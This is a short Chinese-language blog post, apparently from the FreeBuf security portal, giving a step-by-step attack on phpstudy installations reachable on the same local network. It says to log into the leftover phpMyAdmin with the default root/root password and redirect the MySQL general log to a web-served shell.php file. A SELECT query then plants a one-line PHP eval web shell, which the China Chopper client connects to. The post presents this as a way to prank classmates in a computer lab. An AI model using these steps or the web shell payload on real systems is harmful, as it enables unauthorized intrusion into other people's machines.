分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

会员体系（甲方） 会员体系（厂商） 产品名录 企业空间

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

2023-07-14 09:30:31

发现一个phpstudy比较好玩的漏洞，在机房可以捉弄一下小伙伴

Win7虚拟机：192.168.195.132

前提条件

与目标主机出在同一内网

使用phpstudy且没有删除phpMyAdmin文件
装完之后会在根目录创建一个phpMyAdmin文件
物理机访问一下phpMyAdmin文件
用默认账号密码root-root登进去
在变量栏处找到general log，将它改成ON
将general log file的地址改成E:\WWW\shell.php
去SQL栏输入查询语句插入一句话木马

select '<?php eval($_REQUEST[x]);?>'

成功之后就可以打开菜刀连接了

\